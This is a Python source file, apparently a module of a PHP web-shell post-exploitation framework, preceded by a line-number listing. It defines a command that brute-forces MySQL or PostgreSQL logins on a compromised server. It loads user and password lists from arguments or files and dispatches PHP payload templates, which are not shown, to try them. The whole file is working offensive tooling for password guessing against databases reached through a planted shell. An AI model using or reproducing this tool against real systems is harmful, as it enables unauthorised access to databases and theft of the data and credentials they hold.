1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
|
from core.vectors import PhpFile
from core.module import Module
from core import modules
from core import messages
from core.loggers import log
import os
class Sql(Module):
"""Bruteforce SQL database."""
def init(self):
self.register_info(
{
'author': [
'Emilio Pinna'
],
'license': 'GPLv3'
}
)
self.register_vectors(
[
PhpFile(
payload_path = os.path.join(self.folder, 'mysql.tpl'),
name = 'mysql',
),
PhpFile(
payload_path = os.path.join(self.folder, 'pgsql.tpl'),
name = 'pgsql',
)
]
)
self.register_arguments([
{ 'name' : 'service', 'help' : 'Service to bruteforce', 'choices' : self.vectors.get_names() },
{ 'name' : '-hostname', 'help' : 'Hostname', 'default' : 'localhost' },
{ 'name' : '-users', 'help' : 'Users', 'nargs' : '*', 'default': [] },
{ 'name' : '-pwds', 'help' : 'Passwords', 'nargs' : '*', 'default': [] },
{ 'name' : '-fusers', 'help' : 'Local file path containing users list' },
{ 'name' : '-fpwds', 'help' : 'Local file path containing password list' }
])
def run(self, **kwargs):
self.args['users'] = self.args.get('users', [])
if self.args.get('fusers'):
try:
self.args['users'] += open(self.args['fusers'], 'r').read().split(os.linesep)
except Exception as e:
log.warning(
messages.generic.error_loading_file_s_s % (self.args['fusers'], str(e)))
return
self.args['pwds'] = self.args.get('pwds', [])
if self.args.get('fpwds'):
try:
self.args['pwds'] += open(self.args['fpwds'], 'r').read().split(os.linesep)
except Exception as e:
log.warning(
messages.generic.error_loading_file_s_s % (self.args['fpwds'], str(e)))
return
if not self.args['users'] or not self.args['pwds']:
log.error('Error, no users or passwords loaded')
return
return self.vectors.get_result(
name = self.args['service'],
format_args = self.args
)
|
